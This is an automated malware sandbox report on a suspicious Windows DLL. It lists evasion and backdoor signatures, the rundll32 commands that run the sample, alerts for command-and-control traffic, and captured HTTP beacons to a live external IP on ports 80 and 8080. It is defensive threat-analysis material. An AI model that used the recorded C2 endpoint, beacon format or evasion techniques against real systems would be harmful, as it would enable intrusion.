Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
LisectAVT_2403002B_14.dll

Overview

General Information

Sample name:LisectAVT_2403002B_14.dll
Analysis ID:1482059
MD5:2769761a23f793d93bbad3ded28e8ebd
SHA1:df83ef58856650a7564b0f5d0914dc8478511ccf
SHA256:0f0a7d189ef514f97279ef24194c08ea5c99dd39a9d7af486ea8aedb68e0f18b
Tags:dllexe
Infos:

Detection

Score:56
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

System process connects to network (likely due to code injection or exploit)
AI detected suspicious sample
Contains functionality to detect sleep reduction / modifications
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to get notified if a device is plugged in / out
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to shutdown / reboot the system
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evasive API chain checking for process token information
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check if the current machine is a sandbox (GetTickCount - Sleep)
May sleep (evasive loops) to hinder dynamic analysis
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Communication To Uncommon Destination Ports
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication

Classification

Process Tree

  • System is w10x64
  • loaddll32.exe (PID: 6812 cmdline: loaddll32.exe "C:\Users\user\Desktop\LisectAVT_2403002B_14.dll" MD5: 51E6071F9CBA48E79F10C84515AAE618)
    • conhost.exe (PID: 1320 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 5836 cmdline: cmd.exe /C rundll32.exe "C:\Users\user\Desktop\LisectAVT_2403002B_14.dll",#1 MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • rundll32.exe (PID: 3192 cmdline: rundll32.exe "C:\Users\user\Desktop\LisectAVT_2403002B_14.dll",#1 MD5: 889B99C52A60DD49227C5E485A016679)
    • rundll32.exe (PID: 5696 cmdline: rundll32.exe C:\Users\user\Desktop\LisectAVT_2403002B_14.dll,GnrkBltvkx MD5: 889B99C52A60DD49227C5E485A016679)
    • rundll32.exe (PID: 504 cmdline: rundll32.exe C:\Users\user\Desktop\LisectAVT_2403002B_14.dll,GnrkBmoaar MD5: 889B99C52A60DD49227C5E485A016679)
    • rundll32.exe (PID: 2168 cmdline: rundll32.exe C:\Users\user\Desktop\LisectAVT_2403002B_14.dll,GnrkCyrpw MD5: 889B99C52A60DD49227C5E485A016679)
    • rundll32.exe (PID: 6748 cmdline: rundll32.exe "C:\Users\user\Desktop\LisectAVT_2403002B_14.dll",GnrkBltvkx MD5: 889B99C52A60DD49227C5E485A016679)
    • rundll32.exe (PID: 1492 cmdline: rundll32.exe "C:\Users\user\Desktop\LisectAVT_2403002B_14.dll",GnrkBmoaar MD5: 889B99C52A60DD49227C5E485A016679)
    • rundll32.exe (PID: 1416 cmdline: rundll32.exe "C:\Users\user\Desktop\LisectAVT_2403002B_14.dll",GnrkCyrpw MD5: 889B99C52A60DD49227C5E485A016679)
    • rundll32.exe (PID: 5936 cmdline: rundll32.exe "C:\Users\user\Desktop\LisectAVT_2403002B_14.dll",GnrkZtdij MD5: 889B99C52A60DD49227C5E485A016679)
    • rundll32.exe (PID: 516 cmdline: rundll32.exe "C:\Users\user\Desktop\LisectAVT_2403002B_14.dll",GnrkZewk MD5: 889B99C52A60DD49227C5E485A016679)
    • rundll32.exe (PID: 5028 cmdline: rundll32.exe "C:\Users\user\Desktop\LisectAVT_2403002B_14.dll",GnrkXzwnp MD5: 889B99C52A60DD49227C5E485A016679)
    • rundll32.exe (PID: 3516 cmdline: rundll32.exe "C:\Users\user\Desktop\LisectAVT_2403002B_14.dll",GnrkXalbb MD5: 889B99C52A60DD49227C5E485A016679)
    • rundll32.exe (PID: 5068 cmdline: rundll32.exe "C:\Users\user\Desktop\LisectAVT_2403002B_14.dll",GnrkWyey MD5: 889B99C52A60DD49227C5E485A016679)
    • rundll32.exe (PID: 6960 cmdline: rundll32.exe "C:\Users\user\Desktop\LisectAVT_2403002B_14.dll",GnrkWtlrh MD5: 889B99C52A60DD49227C5E485A016679)
    • rundll32.exe (PID: 4980 cmdline: rundll32.exe "C:\Users\user\Desktop\LisectAVT_2403002B_14.dll",GnrkWsnq MD5: 889B99C52A60DD49227C5E485A016679)
    • rundll32.exe (PID: 876 cmdline: rundll32.exe "C:\Users\user\Desktop\LisectAVT_2403002B_14.dll",GnrkWapq MD5: 889B99C52A60DD49227C5E485A016679)
    • rundll32.exe (PID: 5348 cmdline: rundll32.exe "C:\Users\user\Desktop\LisectAVT_2403002B_14.dll",GnrkVnndq MD5: 889B99C52A60DD49227C5E485A016679)
    • rundll32.exe (PID: 3204 cmdline: rundll32.exe "C:\Users\user\Desktop\LisectAVT_2403002B_14.dll",GnrkUsmc MD5: 889B99C52A60DD49227C5E485A016679)
    • rundll32.exe (PID: 2268 cmdline: rundll32.exe "C:\Users\user\Desktop\LisectAVT_2403002B_14.dll",GnrkTrg MD5: 889B99C52A60DD49227C5E485A016679)
    • rundll32.exe (PID: 3892 cmdline: rundll32.exe "C:\Users\user\Desktop\LisectAVT_2403002B_14.dll",GnrkTjxdo MD5: 889B99C52A60DD49227C5E485A016679)
    • rundll32.exe (PID: 6448 cmdline: rundll32.exe "C:\Users\user\Desktop\LisectAVT_2403002B_14.dll",GnrkTch MD5: 889B99C52A60DD49227C5E485A016679)
    • rundll32.exe (PID: 3576 cmdline: rundll32.exe "C:\Users\user\Desktop\LisectAVT_2403002B_14.dll",GnrkTcfv MD5: 889B99C52A60DD49227C5E485A016679)
    • rundll32.exe (PID: 1396 cmdline: rundll32.exe "C:\Users\user\Desktop\LisectAVT_2403002B_14.dll",GnrkStso MD5: 889B99C52A60DD49227C5E485A016679)
    • rundll32.exe (PID: 4148 cmdline: rundll32.exe "C:\Users\user\Desktop\LisectAVT_2403002B_14.dll",GnrkSf MD5: 889B99C52A60DD49227C5E485A016679)
    • rundll32.exe (PID: 6432 cmdline: rundll32.exe "C:\Users\user\Desktop\LisectAVT_2403002B_14.dll",GnrkSbq MD5: 889B99C52A60DD49227C5E485A016679)
    • rundll32.exe (PID: 6600 cmdline: rundll32.exe "C:\Users\user\Desktop\LisectAVT_2403002B_14.dll",GnrkRrdcfn MD5: 889B99C52A60DD49227C5E485A016679)
    • rundll32.exe (PID: 2196 cmdline: rundll32.exe "C:\Users\user\Desktop\LisectAVT_2403002B_14.dll",GnrkQulon MD5: 889B99C52A60DD49227C5E485A016679)
    • rundll32.exe (PID: 2144 cmdline: rundll32.exe "C:\Users\user\Desktop\LisectAVT_2403002B_14.dll",GnrkQr MD5: 889B99C52A60DD49227C5E485A016679)
    • rundll32.exe (PID: 5276 cmdline: rundll32.exe "C:\Users\user\Desktop\LisectAVT_2403002B_14.dll",GnrkQm MD5: 889B99C52A60DD49227C5E485A016679)
    • rundll32.exe (PID: 6968 cmdline: rundll32.exe "C:\Users\user\Desktop\LisectAVT_2403002B_14.dll",GnrkPp MD5: 889B99C52A60DD49227C5E485A016679)
    • rundll32.exe (PID: 5388 cmdline: rundll32.exe "C:\Users\user\Desktop\LisectAVT_2403002B_14.dll",GnrkOxft MD5: 889B99C52A60DD49227C5E485A016679)
    • rundll32.exe (PID: 2864 cmdline: rundll32.exe "C:\Users\user\Desktop\LisectAVT_2403002B_14.dll",GnrkOksgc MD5: 889B99C52A60DD49227C5E485A016679)
    • rundll32.exe (PID: 3896 cmdline: rundll32.exe "C:\Users\user\Desktop\LisectAVT_2403002B_14.dll",GnrkOi MD5: 889B99C52A60DD49227C5E485A016679)
    • rundll32.exe (PID: 3796 cmdline: rundll32.exe "C:\Users\user\Desktop\LisectAVT_2403002B_14.dll",GnrkOhqbhe MD5: 889B99C52A60DD49227C5E485A016679)
    • rundll32.exe (PID: 3924 cmdline: rundll32.exe "C:\Users\user\Desktop\LisectAVT_2403002B_14.dll",GnrkOda MD5: 889B99C52A60DD49227C5E485A016679)
    • rundll32.exe (PID: 5272 cmdline: rundll32.exe "C:\Users\user\Desktop\LisectAVT_2403002B_14.dll",GnrkNsdwzc MD5: 889B99C52A60DD49227C5E485A016679)
    • rundll32.exe (PID: 2828 cmdline: rundll32.exe "C:\Users\user\Desktop\LisectAVT_2403002B_14.dll",GnrkNr MD5: 889B99C52A60DD49227C5E485A016679)
    • rundll32.exe (PID: 6764 cmdline: rundll32.exe "C:\Users\user\Desktop\LisectAVT_2403002B_14.dll",GnrkNofovl MD5: 889B99C52A60DD49227C5E485A016679)
    • rundll32.exe (PID: 5432 cmdline: rundll32.exe "C:\Users\user\Desktop\LisectAVT_2403002B_14.dll",GnrkNlqh MD5: 889B99C52A60DD49227C5E485A016679)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

No yara matches

Sigma Signatures

Sigma detected: Communication To Uncommon Destination Ports
Source: Network ConnectionAuthor: Florian Roth (Nextron Systems): Data: DestinationIp: 52.90.110.169, DestinationIsIpv6: false, DestinationPort: 8080, EventID: 3, Image: C:\Windows\SysWOW64\rundll32.exe, Initiated: true, ProcessId: 2144, Protocol: tcp, SourceIp: 192.168.2.6, SourceIsIpv6: false, SourcePort: 49724

Snort Signatures

No Snort rule has matched

Suricata Signatures

Timestamp:2024-07-25T17:57:11.023216+0200
SID:2036858
Source Port:49733
Destination Port:80
Protocol:TCP
Classtype:Malware Command and Control Activity Detected
Timestamp:2024-07-25T17:55:50.513790+0200
SID:2036858
Source Port:49723
Destination Port:80
Protocol:TCP
Classtype:Malware Command and Control Activity Detected
Timestamp:2024-07-25T17:56:37.112001+0200
SID:2036858
Source Port:49729
Destination Port:8080
Protocol:TCP
Classtype:Malware Command and Control Activity Detected
Timestamp:2024-07-25T17:55:09.573145+0200
SID:2022930
Source Port:443
Destination Port:49720
Protocol:TCP
Classtype:A Network Trojan was detected
Timestamp:2024-07-25T17:55:33.455482+0200
SID:2036858
Source Port:49721
Destination Port:80
Protocol:TCP
Classtype:Malware Command and Control Activity Detected
Timestamp:2024-07-25T17:57:16.369027+0200
SID:2036858
Source Port:49734
Destination Port:80
Protocol:TCP
Classtype:Malware Command and Control Activity Detected
Timestamp:2024-07-25T17:56:23.050140+0200
SID:2036858
Source Port:49726
Destination Port:8080
Protocol:TCP
Classtype:Malware Command and Control Activity Detected
Timestamp:2024-07-25T17:55:11.045496+0200
SID:2036858
Source Port:49718
Destination Port:80
Protocol:TCP
Classtype:Malware Command and Control Activity Detected
Timestamp:2024-07-25T17:54:31.588390+0200
SID:2022930
Source Port:443
Destination Port:49713
Protocol:TCP
Classtype:A Network Trojan was detected
Timestamp:2024-07-25T17:57:05.987539+0200
SID:2036858
Source Port:49732
Destination Port:80
Protocol:TCP
Classtype:Malware Command and Control Activity Detected
Timestamp:2024-07-25T17:56:32.080676+0200
SID:2036858
Source Port:49728
Destination Port:8080
Protocol:TCP
Classtype:Malware Command and Control Activity Detected

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
AI detected suspicious sample
Source: Submited SampleIntegrated Neural Analysis Model: Matched 98.9% probability
Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6CD591E0 FileEncryptionStatusW,0_2_6CD591E0
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 30_2_6CD591E0 FileEncryptionStatusW,30_2_6CD591E0
Source: LisectAVT_2403002B_14.dllStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE, DLL
Source: unknownHTTPS traffic detected: 40.113.110.67:443 -> 192.168.2.6:49710 version: TLS 1.2
Source: unknownHTTPS traffic detected: 40.113.110.67:443 -> 192.168.2.6:49712 version: TLS 1.2
Source: unknownHTTPS traffic detected: 52.165.165.26:443 -> 192.168.2.6:49713 version: TLS 1.2
Source: unknownHTTPS traffic detected: 40.113.110.67:443 -> 192.168.2.6:49717 version: TLS 1.2
Source: unknownHTTPS traffic detected: 40.113.110.67:443 -> 192.168.2.6:49719 version: TLS 1.2
Source: unknownHTTPS traffic detected: 52.165.165.26:443 -> 192.168.2.6:49720 version: TLS 1.2
Source: unknownHTTPS traffic detected: 40.113.110.67:443 -> 192.168.2.6:49722 version: TLS 1.2
Source: unknownHTTPS traffic detected: 40.113.110.67:443 -> 192.168.2.6:49725 version: TLS 1.2
Source: unknownHTTPS traffic detected: 40.113.110.67:443 -> 192.168.2.6:49727 version: TLS 1.2
Source: unknownHTTPS traffic detected: 40.115.3.253:443 -> 192.168.2.6:49731 version: TLS 1.2
Source: LisectAVT_2403002B_14.dllStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6CD52C90 UnregisterDeviceNotification,0_2_6CD52C90

Networking

barindex
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 52.90.110.169 80
Source: C:\Windows\SysWOW64\rundll32.exeDomain query: ec2-52-90-110-169.compute-1.amazonaws.com
Source: global trafficTCP traffic: 192.168.2.6:49724 -> 52.90.110.169:8080
Source: Joe Sandbox ViewIP Address: 1.1.1.1 1.1.1.1
Source: Joe Sandbox ViewIP Address: 40.115.3.253 40.115.3.253
Source: Joe Sandbox ViewASN Name: AMAZON-AESUS AMAZON-AESUS
Source: Joe Sandbox ViewJA3 fingerprint: 28a2c9bd18a11de089ef85a160da29e4
Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: global trafficHTTP traffic detected: POST /update?id=d791f282 HTTP/1.1Accept: */*X-Session: 0X-Status: 0X-Size: 61456X-Sn: 1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;SV1;Host: 52.90.110.169Content-Length: 0Connection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: POST /update?id=36ebb732 HTTP/1.1Accept: */*X-Session: 0X-Status: 0X-Size: 61456X-Sn: 1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;SV1;Host: 52.90.110.169Content-Length: 0Connection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: POST /update?id=8a8b3aa5 HTTP/1.1Accept: */*X-Session: 0X-Status: 0X-Size: 61456X-Sn: 1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;SV1;Host: 52.90.110.169Content-Length: 0Connection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: POST /update?id=dc53bbb9 HTTP/1.1Accept: */*X-Session: 0X-Status: 0X-Size: 61456X-Sn: 1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;SV1;Host: 52.90.110.169:8080Content-Length: 0Connection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: POST /update?id=71f3cbf7 HTTP/1.1Accept: */*X-Session: 0X-Status: 0X-Size: 61456X-Sn: 1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;SV1;Host: 52.90.110.169:8080Content-Length: 0Connection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: POST /update?id=01b63ea5 HTTP/1.1Accept: */*X-Session: 0X-Status: 0X-Size: 61456X-Sn: 1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;SV1;Host: 52.90.110.169:8080Content-Length: 0Connection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: POST /update?id=6171a2b6 HTTP/1.1Accept: */*X-Session: 0X-Status: 0X-Size: 61456X-Sn: 1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;SV1;Host: 52.90.110.169Content-Length: 0Connection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: POST /update?id=592b1d5c HTTP/1.1Accept: */*X-Session: 0X-Status: 0X-Size: 61456X-Sn: 1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;SV1;Host: 52.90.110.169Content-Length: 0Connection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: POST /update?id=7e9d30a3 HTTP/1.1Accept: */*X-Session: 0X-Status: 0X-Size: 61456X-Sn: 1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;SV1;Host: 52.90.110.169Content-Length: 0Connection: Keep-AliveCache-Control: no-cache
Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.64
Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.64
Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.64
Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.64
Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.64
Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.64
Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.64
Source: unknownTCP traffic detected without corresponding DNS query: 52.165.165.26
Source: unknownTCP traffic detected without corresponding DNS query: 52.165.165.26
Source: unknownTCP traffic detected without corresponding DNS query: 52.165.165.26
Source: unknownTCP traffic detected without corresponding DNS query: 52.165.165.26
Source: unknownTCP traffic detected without corresponding DNS query: 52.165.165.26
Source: unknownTCP traffic detected without corresponding DNS query: 52.165.165.26
Source: unknownTCP traffic detected without corresponding DNS query: 52.165.165.26
Source: unknownTCP traffic detected without corresponding DNS query: 52.165.165.26
Source: unknownTCP traffic detected without corresponding DNS query: 52.165.165.26
Source: unknownTCP traffic detected without corresponding DNS query: 52.165.165.26
Source: unknownTCP traffic detected without corresponding DNS query: 52.165.165.26
Source: unknownTCP traffic detected without corresponding DNS query: 52.165.165.26
Source: unknownTCP traffic detected without corresponding DNS query: 52.165.165.26
Source: unknownTCP traffic detected without corresponding DNS query: 52.165.165.26
Source: unknownTCP traffic detected without corresponding DNS query: 52.165.165.26
Source: unknownTCP traffic detected without corresponding DNS query: 52.165.165.26
Source: unknownTCP traffic detected without corresponding DNS query: 52.165.165.26
Source: unknownTCP traffic detected without corresponding DNS query: 52.165.165.26
Source: unknownTCP traffic detected without corresponding DNS query: 52.165.165.26
Source: unknownTCP traffic detected without corresponding DNS query: 52.165.165.26
Source: unknownTCP traffic detected without corresponding DNS query: 52.165.165.26
Source: unknownTCP traffic detected without corresponding DNS query: 52.165.165.26
Source: unknownTCP traffic detected without corresponding DNS query: 52.165.165.26
Source: unknownTCP traffic detected without corresponding DNS query: 52.165.165.26
Source: unknownTCP traffic detected without corresponding DNS query: 2.19.97.171
Source: unknownTCP traffic detected without corresponding DNS query: 2.19.97.171
Source: unknownTCP traffic detected without corresponding DNS query: 40.115.3.253
Source: unknownTCP traffic detected without corresponding DNS query: 40.115.3.253
Source: unknownTCP traffic detected without corresponding DNS query: 40.115.3.253
Source: unknownTCP traffic detected without corresponding DNS query: 40.115.3.253
Source: unknownTCP traffic detected without corresponding DNS query: 40.115.3.253
Source: unknownTCP traffic detected without corresponding DNS query: 40.115.3.253
Source: unknownTCP traffic detected without corresponding DNS query: 40.115.3.253
Source: unknownTCP traffic detected without corresponding DNS query: 40.115.3.253
Source: unknownTCP traffic detected without corresponding DNS query: 40.115.3.253
Source: unknownTCP traffic detected without corresponding DNS query: 40.115.3.253
Source: unknownTCP traffic detected without corresponding DNS query: 40.115.3.253
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 30_2_6CD72DE0 recv,30_2_6CD72DE0
Source: global trafficHTTP traffic detected: GET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=O4c6ORKy9SdKx5O&MD=tSDbY3yp HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
Source: global trafficHTTP traffic detected: GET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=O4c6ORKy9SdKx5O&MD=tSDbY3yp HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
Source: global trafficDNS traffic detected: DNS query: ec2-52-90-110-169.compute-1.amazonaws.com
Source: unknownHTTP traffic detected: POST /update?id=d791f282 HTTP/1.1Accept: */*X-Session: 0X-Status: 0X-Size: 61456X-Sn: 1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;SV1;Host: 52.90.110.169Content-Length: 0Connection: Keep-AliveCache-Control: no-cache
Source: rundll32.exe, 0000001E.00000003.3082529548.0000000003357000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000001E.00000003.3548312483.0000000003357000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000001E.00000003.3942314601.0000000003357000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000001E.00000003.3776753542.0000000003357000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000001E.00000003.3548563603.0000000003357000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000001E.00000003.3548865811.0000000003357000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000001E.00000002.3964912413.0000000003357000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000001E.00000003.3082738725.0000000003357000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000001E.00000003.3306814433.0000000003357000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000001E.00000003.3082804877.0000000003357000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://52.90.110.169/update?id=36ebb732
Source: rundll32.exe, 0000001E.00000003.3082529548.0000000003357000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000001E.00000003.3082738725.0000000003357000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000001E.00000003.3306814433.0000000003357000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000001E.00000003.3082804877.0000000003357000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://52.90.110.169/update?id=36ebb732Q
Source: rundll32.exe, 0000001E.00000003.3082529548.0000000003357000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000001E.00000003.3548312483.0000000003357000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000001E.00000003.3942314601.0000000003357000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000001E.00000003.3776753542.0000000003357000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000001E.00000003.3548563603.0000000003357000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000001E.00000003.3548865811.0000000003357000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000001E.00000002.3964912413.0000000003357000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000001E.00000003.3082738725.0000000003357000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000001E.00000003.3306814433.0000000003357000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000001E.00000003.3082804877.0000000003357000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://52.90.110.169/update?id=36ebb732R
Source: rundll32.exe, 0000001E.00000002.3964912413.0000000003357000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://52.90.110.169/update?id=592b1d5c
Source: rundll32.exe, 0000001E.00000003.3942314601.0000000003357000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000001E.00000002.3964912413.0000000003357000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://52.90.110.169/update?id=592b1d5c5
Source: rundll32.exe, 0000001E.00000003.3942314601.0000000003357000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000001E.00000002.3964912413.0000000003357000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://52.90.110.169/update?id=6171a2b6
Source: rundll32.exe, 0000001E.00000002.3964912413.0000000003357000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000001E.00000002.3964912413.00000000032BA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://52.90.110.169/update?id=7e9d30a3
Source: rundll32.exe, 0000001E.00000003.3942314601.0000000003357000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000001E.00000002.3964912413.0000000003357000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://52.90.110.169/update?id=7e9d30a3H
Source: rundll32.exe, 0000001E.00000003.3942314601.0000000003357000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000001E.00000002.3964912413.0000000003357000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://52.90.110.169/update?id=7e9d30a3Q
Source: rundll32.exe, 0000001E.00000003.3942314601.0000000003357000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000001E.00000002.3964912413.0000000003357000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://52.90.110.169/update?id=7e9d30a3s
Source: rundll32.exe, 0000001E.00000003.3082804877.0000000003357000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://52.90.110.169/update?id=8a8b3aa5
Source: rundll32.exe, 0000001E.00000003.3082529548.0000000003357000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000001E.00000003.3548312483.0000000003357000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000001E.00000003.3942314601.0000000003357000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000001E.00000003.3776753542.0000000003357000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000001E.00000003.3548563603.0000000003357000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000001E.00000003.3548865811.0000000003357000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000001E.00000002.3964912413.0000000003357000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000001E.00000003.3082738725.0000000003357000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000001E.00000003.3306814433.0000000003357000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000001E.00000003.3082804877.0000000003357000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://52.90.110.169/update?id=8a8b3aa5i
Source: rundll32.exe, 0000001E.00000003.3082529548.0000000003357000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000001E.00000003.3548312483.0000000003357000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000001E.00000003.3942314601.0000000003357000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000001E.00000003.3776753542.0000000003357000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000001E.00000003.3548563603.0000000003357000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000001E.00000003.3548865811.0000000003357000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000001E.00000002.3964912413.0000000003357000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000001E.00000003.3082738725.0000000003357000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000001E.00000003.3306814433.0000000003357000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000001E.00000003.3082804877.0000000003357000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://52.90.110.169/update?id=d791f282
Source: rundll32.exe, 0000001E.00000003.3548312483.0000000003357000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000001E.00000002.3964912413.0000000003362000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000001E.00000003.3942314601.0000000003362000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000001E.00000003.3776753542.0000000003357000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000001E.00000003.3548563603.0000000003357000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000001E.00000003.3548865811.0000000003357000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000001E.00000002.3964912413.00000000032BA000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000001E.00000002.3964912413.00000000032F5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://52.90.110.169:8080/update?id=01b63ea5
Source: rundll32.exe, 0000001E.00000003.3548312483.0000000003357000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000001E.00000003.3776753542.0000000003357000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000001E.00000003.3548563603.0000000003357000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000001E.00000003.3548865811.0000000003357000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://52.90.110.169:8080/update?id=01b63ea5date?id=d791f282
Source: rundll32.exe, 0000001E.00000002.3964912413.0000000003362000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000001E.00000003.3942314601.0000000003362000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://52.90.110.169:8080/update?id=01b63ea5fa
